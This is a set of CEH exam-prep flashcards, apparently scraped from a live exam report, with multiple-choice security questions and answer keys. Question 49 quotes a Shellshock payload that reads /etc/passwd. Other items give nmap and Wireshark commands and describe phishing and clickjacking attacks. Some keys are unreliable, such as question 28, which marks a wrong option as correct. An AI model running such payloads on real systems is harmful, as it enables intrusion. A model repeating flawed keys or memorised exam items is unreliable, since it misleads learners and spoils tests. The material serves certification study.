CEH Test Questions Flashcards

1
Q

User A is writing a sensitive email message to user B outside the local network. User A has chosen to use PKI to secure his message and ensure only user B can read the sensitive email. At what layer of the OSI layer does the encryption and decryption of the message take place?

A. Application
B. Transport
C. Session
D. Presentation

A

D. Presentation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A new wireless client is configured to join a 802.11 network. This client uses the same hardware and software as many of the other clients on the network. The client can see the network, but cannot connect. A wireless packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association requests being sent by the wireless client. What is a possible source of this problem?

A. The WAP does not recognize the client’s MAC address
B. The client cannot see the SSID of the wireless network
C. Client is configured for the wrong channel
D. The wireless client is not configured to use DHCP

A

A. The WAP does not recognize the client’s MAC address

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist’s email, and you send her an email changing the source email to her boss’s email (boss@company). In this email, you ask for a pdf with information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don’t work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use?

A. Social engineering
B. Piggybacking
C. Tailgating
D. Eavesdropping

A

A. Social engineering

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option could the tester use to get a response from a host using TCP?

A. Traceroute
B. Hping
C. TCP ping
D. Broadcast ping

A

B. Hping

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Which is the first step followed by Vulnerability Scanners for scanning a network?

A. OS Detection
B. Firewall detection
C. TCP/UDP Port scanning
D. Checking if the remote host is alive

A

D. Checking if the remote host is alive

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Which of the following programs is usually targeted at Microsoft Office products?

A. Polymorphic virus
B. Multipart virus
C. Macro virus
D. Stealth virus

A

C. Macro virus

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway they are both on the 192.168.1.0/24. Which of the following has occurred?

The computer is not using a private IP address.
The gateway is not routing to a public IP address.
The gateway and the computer are not on the same network.
The computer is using an invalid IP address.

A

The gateway is not routing to a public IP address.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Identify the UDP port that Network Time Protocol (NTP) uses as its primary means of communication?

113
69
123
161

A

123

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Which of the following tools performs comprehensive tests against web servers, including dangerous files and CGIs?

Nikto
John the Ripper
Dsniff
Snort

A

Nikto

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the investigator attempts to correlate the information in all of the logs, the sequence of many of the logged events do not match up. What is the most likely cause?

The network devices are not all synchronized.
Proper chain of custody was not observed while collecting the logs.
The attacker altered or erased events from the logs.
The security breach was a false positive.

A

The network devices are not all synchronized.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?

Circuit
Stateful
Application
Packet Filtering

A

Application

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

By using a smart card and pin, you are using a two-factor authentication that satisfies

Something you are and something you remember
Something you have and something you know
Something you know and something you are
Something you have and something you are

A

Something you have and something you know

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

“ ……. is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hot-spot by posing as a legitimate provider. This type of attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent web site and luring people there.”

Fill in the blank with appropriate choice.

Evil Twin Attack
Sinkhole Attack
Collision Attack
Signal Jamming Attack

A

Evil Twin Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What term describes the amount of risk that remains after the vulnerabilities are classified and the countermeasures have been deployed?

Residual risk
Impact risk
Deferred risk
Inherent risk

A

Residual risk

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, small sized packets to the target computer, making it very difficult for an IDS to detect the attack signatures. Which tool can be used to perform session splicing attacks?

tcpsplice
Burp
Hydra
Whisker

A

Whisker

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

You have successfully comprised a server having an IP address of 10.10.0.5. You would like to enumerate all machines in the same network quickly. What is the best Nmap command you will use?

nmap -T4 -q 10.10.0.0/24
nmap -T4 -F 10.10.0.0/24
nmap -T4 -r 10.10.1.0/24
nmap -T4 -O 10.10.0.0/24

A

nmap -T4 -F 10.10.0.0/24

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Which of the following is the BEST way to defend against network sniffing?

Using encryption protocols to secure network communications
Register all machines MAC Address in a Centralized Database
Use Static IP Address
Restrict Physical Access to Server Rooms hosting Critical Servers

A

Using encryption protocols to secure network communications

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Although FTP traffic is not encrypted by default, which layer 3 protocol would allow for end-to-end encryption of the connection?

SFTP
Ipsec
SSL
FTPS

A

Ipsec

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

You are the Network Admin, and you get a complaint that some of the websites are no longer accessible. You try to ping the servers and find them to be reachable. Then you type the IP address and then you try on the browser, and find it to be accessible. But they are not accessible when you try using the URL. What may be the problem?

Traffic is Blocked on UDP Port 53
Traffic is Blocked on TCP Port 80
Traffic is Blocked on TCP Port 54
Traffic is Blocked on UDP Port 80

A

Traffic is Blocked on UDP Port 53

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a linux platform?

Kismet
Abel
Netstumbler
Nessus

A

Kismet

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Scenario1:
Victim opens the attacker’s web site.
Attacker sets up a web site which contains interesting and attractive content like ‘Do you want to make
$1000 in a day?’.
Victim clicks to the interesting and attractive content URL.
Attacker creates a transparent ‘iframe’ in front of the URL which victim attempts to click, so victim thinks that he/she clicks to the ‘Do you want to make $1000 in a day?’ URL but actually he/she clicks to the content or URL that exists in the transparent ‘iframe’ which is setup by the attacker.

What is the name of the attack which is mentioned in the scenario?

Session Fixation
HTML Injection
HTTP Parameter Pollution
Clickjacking Attack

A

Clickjacking Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named “nc.” The FTP server’s access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP server’s software. The “ps” command shows that the “nc” file is running as process, and the netstat command shows the “nc” process is listening on a network port.

What kind of vulnerability must be present to make this remote attack possible?

File system permissions
Privilege escalation
Directory traversal
Brute force login

A

File system permissions

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Which method of password cracking takes the most time and effort?

Dictionary attack
Shoulder surfing
Rainbow tables
Brute force

A

Brute force

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

What does the –oX flag do in an Nmap scan?

Perform an eXpress scan
Output the results in truncated format to the screen
Output the results in XML format to a file
Perform an Xmas scan

A

Output the results in XML format to a file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

A bank stores and processes sensitive privacy information related to home loans. However, auditing has never been enabled on the system. What is the first step that the bank should take before enabling the audit feature?

Perform a vulnerability scan of the system.
Determine the impact of enabling the audit feature.
Perform a cost/benefit analysis of the audit feature.
Allocate funds for staffing of audit log review.

A

Determine the impact of enabling the audit feature.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

Which Intrusion Detection System is the best applicable for large environments where critical assets on the network need extra scrutiny and is ideal for observing sensitive network segments?

Honeypots
Firewalls
Network-based intrusion detection system (NIDS)
Host-based intrusion detection system (HIDS)

A

Network-based intrusion detection system (NIDS)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

The collection of potentially actionable, overt, and publicly available information is known as

Open-source intelligence
Real intelligence
Social intelligence
Human intelligence

A

Open-source intelligence

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

What is one of the advantages of using both symmetric and asymmetric cryptography in SSL/TLS?

Supporting both types of algorithms allows less-powerful devices such as mobile phones to use symmetric encryption instead.

Symmetric algorithms such as AES provide a failsafe when asymmetric methods fail.

Symmetric encryption allows the server to security transmit the session keys out-of-band.

Asymmetric cryptography is computationally expensive in comparison. However, it is well-suited to securely negotiate keys for use with symmetric cryptography.

A

Supporting both types of algorithms allows less-powerful devices such as mobile phones to use symmetric encryption instead.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

The change of a hard drive failure is once every three years. The cost to buy a new hard drive is $300.
It will require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore the database from the last backup to the new hard disk. The recovery person earns
$10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1(100%). What is the closest approximate cost of this replacement and recovery operation per year?

$1320
$440
$100
$146

A

$146

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

What is the known plaintext attack used against DES which gives the result that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key?

Man-in-the-middle attack
Meet-in-the-middle attack
Replay attack
Traffic analysis attack

A

Meet-in-the-middle attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on walking patterns and implemented this approach to a physical control access.
A camera captures people walking and identifies the individuals using Steve’s approach.
After that, people must approximate their RFID badges. Both the identifications are required to open the door. In this case, we can say:

Although the approach has two phases, it actually implements just one authentication factor

The solution implements the two authentication factors: physical object and physical characteristic

The solution will have a high level of false positives

Biological motion cannot be used to identify people

A

The solution implements the two authentication factors: physical object and physical characteristic

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

What is not a PCI compliance recommendation?

Use a firewall between the public network and the payment card data.

Use encryption to protect all transmission of card holder data over any public network.

Rotate employees handling credit card transactions on a yearly basis to different departments.

Limit access to card holder data to as few individuals as possible.

A

Rotate employees handling credit card transactions on a yearly basis to different departments.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

What is the minimum number of network connections in a multihomed firewall?

3
5
4
2

A

3

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

Suppose your company has just passed a security risk assessment exercise. The results display that the risk of the breach in the main company application is 50%. Security staff has taken some measures and implemented the necessary controls. After that, another security risk assessment was performed showing that risk has decreased to 10%. The risk threshold for the application is 20%. Which of the following risk decisions will be the best for the project in terms of its successful continuation with the most business profit?

Accept the risk
Introduce more controls to bring risk to 0%
Mitigate the risk
Avoid the risk

A

Accept the risk

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?

All three servers need to be placed internally

A web server facing the Internet, an application server on the internal network, a database server on the internal network

A web server and the database server facing the Internet, an application server on the internal network

All three servers need to face the Internet so that they can communicate between themselves

A

A web server facing the Internet, an application server on the internal network, a database server on the internal network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

An attacker, using a rogue wireless AP, performed an MITM attack and injected an HTML code to embed a malicious applet in all HTTP connections.
When users accessed any page, the applet ran and exploited many machines. Which one of the following tools the hacker probably used to inject HTML code?

Wireshark
Ettercap
Aircrack-ng
Tcpdump

A

Ettercap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN?

ESP transport mode
ESP confidential
AH permiscuous
AH Tunnel mode

A

ESP transport mode

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

Hackers often raise the trust level of a phishing message by modeling the email to look similar to the internal email used by the target company. This includes using logos, formatting, and names of the target company. The phishing message will often use the name of the company CEO, President, or
Managers. The time a hacker spends performing research to locate this information about a company is known as?

Exploration
Investigation
Reconnaissance
Enumeration

A

Reconnaissance

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being run?

Macro virus
Stealth/Tunneling virus
Cavity virus
Polymorphic virus

A

Stealth/Tunneling virus

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

The “Gray-box testing” methodology enforces what kind of restriction?

Only the external operation of a system is accessible to the tester.
The internal operation of a system in only partly accessible to the tester.
Only the internal operation of a system is known to the tester.
The internal operation of a system is completely known to the tester.

A

The internal operation of a system in only partly accessible to the tester.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator’s Computer to update the router configuration. What type of an alert is this?

False negative
True negative
True positive
False positive

A

False positive

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the Prometric Online Testing – Reports https://ibt1.prometric.com/users/custom/report_queue/rq_str… corporate network. What tool should the analyst use to perform a Blackjacking attack?

Paros Proxy
BBProxy
Blooover
BBCrack

A

BBProxy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

When you are getting information about a web server, it is very important to know the HTTP Methods (GET, POST, HEAD, PUT, DELETE, TRACE) that are available because there are two critical methods (PUT and DELETE). PUT can upload a file to the server and DELETE can delete a file from the server. You can detect all these methods (GET, POST, HEAD, DELETE, PUT, TRACE) using NMAP script engine. What Nmap script will help you with this task?

http-methods
http enum
http-headers
http-git

A

http-methods

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

Todd has been asked by the security officer to purchase a counter-based authentication system. Which of the following best describes this type of system?

A biometric system that bases authentication decisions on behavioral attributes.

A biometric system that bases authentication decisions on physical attributes.

An authentication system that creates one-time passwords that are encrypted with secret keys.

An authentication system that uses passphrases that are converted into virtual passwords.

A

An authentication system that creates one-time passwords that are encrypted with secret keys.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

Which of the following is a low-tech way of gaining unauthorized access to systems?

Social Engineering
Eavesdropping
Scanning
Sniffing

A

Social Engineering

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

Which system consists of a publicly available set of databases that contain domain name registration contact information?

WHOIS
CAPTCHA
IANA
IETF

A

WHOIS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Why is a penetration test considered to be more thorough than vulnerability scan?

Vulnerability scans only do host discovery and port scanning by default.

A penetration test actively exploits vulnerabilities in the targeted infrastructure, while a vulnerability scan does not typically involve active exploitation.

It is not – a penetration test is often performed by an automated tool, while a vulnerability scan requires active engagement.

The tools used by penetration testers tend to have much more comprehensive vulnerability databases.

A

A penetration test actively exploits vulnerabilities in the targeted infrastructure, while a vulnerability scan does not typically involve active exploitation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

Bob received this text message on his mobile phone: “Hello, this is Scott Smelby from the Yahoo Bank. Kindly contact me for a vital transaction on: scottsmelby@yahoo.com”.

Which statement below is true?

This is a scam as everybody can get a @yahoo address, not the Yahoo customer service employees.

This is a scam because Bob does not know Scott.

Bob should write to scottmelby@yahoo.com to verify the identity of Scott.

This is probably a legitimate message as it comes from a respectable organization.

A

This is a scam as everybody can get a @yahoo address, not the Yahoo customer service employees.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

env x=’(){ :;};echo exploit’ bash –c ‘cat/etc/passwd’

What is the Shellshock bash vulnerability attempting to do on a vulnerable Linux host?

Removes the passwd file
Changes all passwords in passwd
Add new user to the passwd file
Display passwd content to prompt

A

Display passwd content to prompt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

Which of the following is assured by the use of a hash?

Authentication
Confidentiality
Availability
Integrity

A

Integrity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

Which results will be returned with the following Google search query? site:target.com – site:Marketing.target.com accounting

Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting.
Results matching all words in the query.
Results for matches on target.com and Marketing.target.com that include the word “accounting”
Results matching “accounting” in domain target.com but not on the site Marketing.target.com

A

Results matching “accounting” in domain target.com but not on the site Marketing.target.com

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

Email is transmitted across the Internet using the Simple Mail Transport Protocol. SMTP does not encrypt email, leaving the information in the message vulnerable to being read by an unauthorized person. SMTP can upgrade a connection between two mail servers to use TLS. Email transmitted by SMTP over TLS is encrypted. What is the name of the command used by SMTP to transmit email over TLS?

OPPORTUNISTICTLS
UPGRADETLS
FORCETLS
STARTTLS

A

STARTTLS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

In the field of cryptanalysis, what is meant by a “rubber-hose” attack?

Forcing the targeted keystream through a hardware-accelerated device such as an ASIC.
A backdoor placed into a cryptographic algorithm by its creator.
Extraction of cryptographic secrets through coercion or torture.
Attempting to decrypt ciphertext by making logical assumptions about the contents of the original plaintext

A

Extraction of cryptographic secrets through coercion or torture.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

You are a Network Security Officer. You have two machines. The first machine (192.168.0.99) has snort installed, and the second machine (192.168.0.150) has kiwi syslog installed. You perform a syn scan in your network, and you notice that kiwi syslog is not receiving the alert message from snort. You decide to run wireshark in the snort machine to check if the messages are going to the kiwi syslog machine. What Wireshark filter will show the connections from the snort machine to kiwi syslog machine?

tcp.srcport= = 514 && ip.src= = 192.168.0.99
tcp.srcport= = 514 && ip.src= = 192.168.150
tcp.dstport= = 514 && ip.dst= = 192.168.0.99
tcp.dstport= = 514 && ip.dst= = 192.168.0.150

A

tcp.dstport= = 514 && ip.dst= = 192.168.0.150

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

What two conditions must a digital signature meet?

Has to be the same number of characters as a physical signature and must be unique.
Has to be unforgeable, and has to be authentic.
Must be unique and have special characters.
Has to be legible and neat.

A

Has to be unforgeable, and has to be authentic.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

A company’s security policy states that all Web browsers must automatically delete their HTTP browser cookies upon terminating. What sort of security breach is this policy attempting to mitigate?

Attempts by attackers to access the user and password information stored in the company’s SQL database.
Attempts by attackers to access Web sites that trust the Web browser user by stealing the user’s authentication credentials.
Attempts by attackers to access password stored on the user’s computer without the user’s knowledge.
Attempts by attackers to determine the user’s Web browser usage patterns, including when sites were visited and for how long.

A

Attempts by attackers to access Web sites that trust the Web browser user by stealing the user’s authentication credentials.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

What is correct about digital signatures?

A digital signature cannot be moved from one signed document to another because it is the hash of the original document encrypted with the private key of the signing party.
Digital signatures may be used in different documents of the same type.
A digital signature cannot be moved from one signed document to another because it is a plain hash of the document content.
Digital signatures are issued once for each user and can be used everywhere until they expire.

A

A digital signature cannot be moved from one signed document to another because it is the hash of the original document encrypted with the private key of the signing party.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

An attacker with access to the inside network of a small company launches a successful STP manipulation attack. What will he do next?

He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer.
He will activate OSPF on the spoofed root bridge.
He will repeat this action so that it escalates to a DoS attack.
He will repeat the same attack against all L2 switches of the network.

A

He will create a SPAN entry on the spoofed root bridge and redirect traffic to his computer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

You have gained physical access to a Windows 2008 R2 server which has an accessible disc drive. When you attempt to boot the server and log in, you are unable to guess the password. In your toolkit, you have an Ubuntu 9.10 Linux LiveCD. Which Linux-based tool can change any user’s password or activate disabled Windows accounts?

John the Ripper
SET
CHNTPW
Cain & Abel

A

CHNTPW

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

What does a firewall check to prevent particular ports and applications from getting packets into an organization?

Transport layer port numbers and application layer headers
Presentation layer headers and the session layer port numbers
Network layer headers and the session layer port numbers
Application layer port numbers and the transport layer headers

A

Transport layer port numbers and application layer headers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

___ is a set of extensions to DNS that provide the origin authentication of DNS data to DNS
clients (resolvers) so as to reduce the threat of DNS poisoning, spoofing, and similar types of attacks.

DNSSEC
Resource records
Resource transfer
Zone transfer

A

DNSSEC

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to “www.MyPersonalBank.com”, the user is directed to a phishing site.

Which file does the attacker need to modify?

Boot.ini
Sudoers
Networks
Hosts

A

Hosts

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

Which of the following incident handling process phases is responsible for defining rules, collaborating human workforce, creating a back-up plan, and testing the plans for an organization?

Preparation phase
Containment phase
Identification phase
Recovery phase

A

Preparation phase

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

The configuration allows a wired or wireless network interface controller to pass all traffic it receives to the Central Processing Unit (CPU), rather than passing only the frames that the controller is intended to receive. Which of the following is being described?

Multi-cast mode
Promiscuous mode
WEM
Port forwarding

A

Promiscuous mode

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

A large mobile telephony and data network operator has a data center that houses network elements. These are essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and IPS systems.

What is the best security policy concerning this setup?

Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed.

As long as the physical access to the network elements is restricted, there is no need for additional measures.

There is no need for specific security measures on the network elements as long as firewalls and IPS systems exist.

The operator knows that attacks and down time are inevitable and should have a backup site.

A

Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

PGP, SSL, and IKE are all examples of which type of cryptography?

Digest
Secret Key
Public Key
Hash Algorithm

A

Public Key

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

Peter is surfing the internet looking for information about DX Company. Which hacking process is Peter doing?

Scanning
Footprinting
Enumeration
System Hacking

A

Footprinting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

A hacker is an intelligent individual with excellent computer skills and the ability to explore a computer’s software and hardware without the owner’s permission. Their intention can either be to simply gain knowledge or to illegally make changes.
Which of the following class of hacker refers to an individual who works both offensively and defensively at various times?

White Hat
Suicide Hacker
Gray Hat
Black Hat

A

Gray Hat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

During a recent security assessment, you discover the organization has one Domain Name Server (DNS) in a Demilitarized Zone (DMZ) and a second DNS server on the internal network.

What is this type of DNS configuration commonly called?

DynDNS
DNS Scheme
DNSSEC
Split DNS

A

Split DNS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

What kind of detection techniques is being used in antivirus software that identifies malware by collecting data from multiple protected systems and instead of analyzing files locally it’s made on the provider’s environment?

Behavioral based
Heuristics based
Honeypot based
Cloud based

A

Cloud based

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q

Which of the following tools is used to analyze the files produced by several packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?

tcptrace
Nessus
OpenVAS
tcptraceroute

A

tcptrace

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q

What is the way to decide how a packet will move from an untrusted outside host to a protected inside that is behind a firewall, which permits the hacker to determine which ports are open and if the packets can pass through the packet-filtering of the firewall?

Session hijacking
Firewalking
Man-in-the middle attack
Network sniffing

A

Firewalking

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q

Which of the following is not a Bluetooth attack?

Bluedriving
Bluesmacking
Bluejacking
Bluesnarfing

A

Bluedriving

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q

What is the role of test automation in security testing?

It is an option but it tends to be very expensive.

It should be used exclusively. Manual testing is outdated because of low speed and possible test setup inconsistencies.

Test automation is not usable in security due to the complexity of the tests.

It can accelerate benchmark tests and repeat them with a consistent test setup. But it cannot replace manual testing completely.

A

It can accelerate benchmark tests and repeat them with a consistent test setup. But it cannot replace manual testing completely.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
75
Q

Your company performs penetration tests and security assessments for small and medium-sized business in the local area. During a routine security assessment, you discover information that suggests your client is involved with human trafficking.

What should you do?

Confront the client in a respectful manner and ask her about the data.

Copy the data to removable media and keep it in case you need it.

Ignore the data and continue the assessment until completed as agreed.

Immediately stop work and contact the proper legal authorities.

A

Immediately stop work and contact the proper legal authorities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q

While using your bank’s online servicing you notice the following string in the URL bar:

“http://www.MyPersonalBank.com/account?id=368940911028389&Damount=10980&Camount=21”

You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflects the changes.

Which type of vulnerability is present on this site?

Cookie Tampering
SQL Injection
Web Parameter Tampering
XSS Reflection

A

Web Parameter Tampering

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q

The establishment of a TCP connection involves a negotiation called three-way handshake. What type of message does the client send to the server in order to begin this negotiation?

ACK
SYN
RST
SYN-ACK

A

SYN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q

Which type of security feature stops vehicles from crashing through the doors of a building?

Bollards
Receptionist
Mantrap
Turnstile

A

Bollards

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q

The company ABC recently contracts a new accountant. The accountant will be working with the financial statements. Those financial statements need to be approved by the CFO and then they will be sent to the accountant but the CFO is worried because he wants to be sure that the information sent to the accountant was not modified once he approved it. Which of the following options can be useful to ensure the integrity of the data?

The CFO can use a hash algorithm in the document once he approved the financial statements

The CFO can use an excel file with a password

The financial statements can be sent twice, one by email and the other delivered in USB and the accountant can compare both to be sure is the same document

The document can be sent to the accountant using an exclusive USB for that document

A

The CFO can use a hash algorithm in the document once he approved the financial statements

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q

What is the purpose of a demilitarized zone on a network?

To scan all traffic coming through the DMZ to the internal network

To only provide direct access to the nodes within the DMZ and protect the network behind it

To provide a place to put the honeypot

To contain the network devices you wish to protect

A

To only provide direct access to the nodes within the DMZ and protect the network behind it

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q

Which of the following Linux commands will resolve a domain name into IP address?

> host-t a hackeddomain.com
host-t ns hackeddomain.com
host -t soa hackeddomain.com
host -t AXFR hackeddomain.com

A

> host-t a hackeddomain.com

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q

Shellshock allowed an unauthorized user to gain access to a server. It affected many Internet-facing services, which OS did it not directly affect?

Linux
Unix
OS X
Windows

A

Windows

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q

Which regulation defines security and privacy controls for Federal information systems and organizations?

HIPAA
EU Safe Harbor
PCI-DSS
NIST-800-53

A

NIST-800-53

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q

What is a “Collision attack” in cryptography?

Collision attacks try to get the public key

Collision attacks try to break the hash into three parts to get the plaintext value

Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key

Collision attacks try to find two inputs producing the same hash

A

Collision attacks try to find two inputs producing the same hash

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q

Which of the following tools can be used for passive OS fingerprinting?

nmap
tcpdump
tracert
ping

A

tcpdump

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q

Which of the following describes the characteristics of a Boot Sector Virus?

Modifies directory table entries so that directory entries point to the virus code instead of the actual program.

Moves the MBR to another location on the RAM and copies itself to the original location of the MBR.

Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.

Overwrites the original MBR and only executes the new virus code.

A

Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q

Your company was hired by a small healthcare provider to perform a technical assessment on the network.

What is the best approach for discovering vulnerabilities on a Windows-based computer?

Use the built-in Windows Update tool

Use a scan tool like Nessus

Check MITRE.org for the latest list of CVE findings

Create a disk image of a clean Windows installation

A

Use a scan tool like Nessus

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
88
Q

Which of the following is a command line packet analyzer similar to GUI-based Wireshark?

nessus
tcpdump
ethereal
jack the ripper

A

tcpdump

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
89
Q

DHCP snooping is a great solution to prevent rogue DHCP servers on your network. Which security feature on switchers leverages the DHCP snooping database to help prevent man-in-the-middle attacks?

Spanning tree
Dynamic ARP Inspection (DAI)
Port security
Layer 2 Attack Prevention Protocol (LAPP)

A

Dynamic ARP Inspection (DAI)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
90
Q

Bob, a network administrator at BigUniversity, realized that some students are connecting their notebooks in the wired network to have Internet access. In the university campus, there are many Ethernet ports available for professors and authorized visitors but not for students.

He identified this when the IDS alerted for malware activities in the network. What should Bob do to avoid this problem?

Disable unused ports in the switches

Separate students in a different VLAN

Use the 802.1x protocol

Ask students to use the wireless network

A

Use the 802.1x protocol

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
91
Q

